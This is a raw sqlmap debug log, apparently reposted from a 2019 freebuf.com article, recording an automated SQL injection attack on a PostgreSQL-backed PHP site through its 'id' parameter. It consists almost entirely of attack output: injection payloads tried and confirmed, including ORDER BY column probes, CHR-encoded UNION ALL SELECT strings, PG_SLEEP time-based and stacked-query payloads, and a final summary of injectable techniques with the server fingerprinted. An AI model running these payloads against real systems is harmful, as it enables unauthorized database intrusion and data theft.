[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL AND time-based blind (ELT)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR time-based blind (ELT)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL AND time-based blind (ELT - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR time-based blind (ELT - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind (IF)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind (IF - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird >= 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird >= 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird >= 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird >= 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - Parameter replace' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (bool)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (ELT)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (MAKE_SET)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:13:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:13:42] [PAYLOAD] 1 ORDER BY 1-- ukrS
[00:13:42] [PAYLOAD] 1 ORDER BY 9562-- Pqqc
[00:13:43] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:13:43] [PAYLOAD] 1 ORDER BY 10-- zBVe
[00:13:43] [PAYLOAD] 1 ORDER BY 6-- hvQT
[00:13:43] [PAYLOAD] 1 ORDER BY 4-- ePmH
[00:13:43] [PAYLOAD] 1 ORDER BY 5-- dwXY
[00:13:43] [INFO] target URL appears to have 4 columns in query
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(98)||CHR(83)||CHR(68)||CHR(80)||CHR(101)||CHR(117)||CHR(69)||CHR(84)||CHR(73)||CHR(67)||CHR(71)||CHR(122)||CHR(104)||CHR(86)||CHR(68)||CHR(73)||CHR(67)||CHR(88)||CHR(122)||CHR(75)||CHR(77)||CHR(78)||CHR(65)||CHR(120)||CHR(81)||CHR(102)||CHR(99)||CHR(66)||CHR(110)||CHR(65)||CHR(88)||CHR(116)||CHR(75)||CHR(74)||CHR(103)||CHR(100)||CHR(100)||CHR(90)||CHR(82)||CHR(85))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL-- QaoY
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT (CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(70)||CHR(121)||CHR(107)||CHR(107)||CHR(119)||CHR(90)||CHR(65)||CHR(111)||CHR(75)||CHR(100)||CHR(84)||CHR(106)||CHR(68)||CHR(97)||CHR(81)||CHR(72)||CHR(121)||CHR(113)||CHR(98)||CHR(107)||CHR(70)||CHR(81)||CHR(71)||CHR(111)||CHR(106)||CHR(72)||CHR(84)||CHR(90)||CHR(71)||CHR(77)||CHR(117)||CHR(118)||CHR(115)||CHR(72)||CHR(79)||CHR(72)||CHR(77)||CHR(108)||CHR(120)||CHR(83))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL,NULL,NULL-- fEEy
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(81)||CHR(110)||CHR(118)||CHR(72)||CHR(115)||CHR(107)||CHR(111)||CHR(88)||CHR(66)||CHR(86)||CHR(79)||CHR(104)||CHR(98)||CHR(78)||CHR(68)||CHR(107)||CHR(79)||CHR(79)||CHR(103)||CHR(86)||CHR(102)||CHR(68)||CHR(115)||CHR(98)||CHR(80)||CHR(99)||CHR(104)||CHR(122)||CHR(114)||CHR(103)||CHR(70)||CHR(114)||CHR(98)||CHR(112)||CHR(72)||CHR(79)||CHR(76)||CHR(97)||CHR(81)||CHR(87))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113))-- HcGU
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(109)||CHR(102)||CHR(78)||CHR(84)||CHR(117)||CHR(112)||CHR(98)||CHR(120)||CHR(89)||CHR(84)||CHR(112)||CHR(72)||CHR(120)||CHR(102)||CHR(106)||CHR(85)||CHR(118)||CHR(89)||CHR(83)||CHR(101)||CHR(81)||CHR(68)||CHR(110)||CHR(104)||CHR(120)||CHR(109)||CHR(90)||CHR(82)||CHR(120)||CHR(109)||CHR(108)||CHR(80)||CHR(68)||CHR(74)||CHR(84)||CHR(103)||CHR(82)||CHR(85)||CHR(87)||CHR(121))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL,NULL-- aLXg
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(74)||CHR(108)||CHR(84)||CHR(86)||CHR(121)||CHR(105)||CHR(68)||CHR(90)||CHR(79)||CHR(78))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL-- VYJL
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(74)||CHR(108)||CHR(84)||CHR(86)||CHR(121)||CHR(105)||CHR(68)||CHR(90)||CHR(79)||CHR(78))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(86)||CHR(103)||CHR(77)||CHR(106)||CHR(70)||CHR(116)||CHR(122)||CHR(72)||CHR(72)||CHR(105))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL-- GScf
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(74)||CHR(108)||CHR(84)||CHR(86)||CHR(121)||CHR(105)||CHR(68)||CHR(90)||CHR(79)||CHR(78))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL FROM (SELECT 0 AS Yfmw UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS jKrK-- AKZx
[00:13:43] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[00:13:43] [DEBUG] skipping test 'Generic UNION query (random number) - 1 to 20 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (random number) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (random number) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (random number) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (random number) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 20 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (random number) - 1 to 20 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (random number) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (random number) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (NULL) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (random number) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (NULL) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (random number) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] checking for parameter length constraining mechanisms
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7910=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7910) THEN (CHR(49)) ELSE (CHR(48)) END))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL-- ePVz
[00:13:43] [DEBUG] performed 1 queries in 0.04 seconds
[00:13:43] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
[00:13:43] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[00:13:43] [DEBUG] used the default behavior, running in batch mode
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1338=1338
    Vector: AND [INFERENCE]

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 7925=CAST((CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7925=7925) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)) AS NUMERIC)
    Vector: AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: id=1;SELECT PG_SLEEP(5)--
    Vector: ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: id=1 AND 4944=(SELECT 4944 FROM PG_SLEEP(5))
    Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(74)||CHR(108)||CHR(84)||CHR(86)||CHR(121)||CHR(105)||CHR(68)||CHR(90)||CHR(79)||CHR(78))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL-- VYJL
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]
---
[00:13:43] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: PostgreSQL

Source: freebuf.com 2019-08-20 12:14:30 by: 陌度
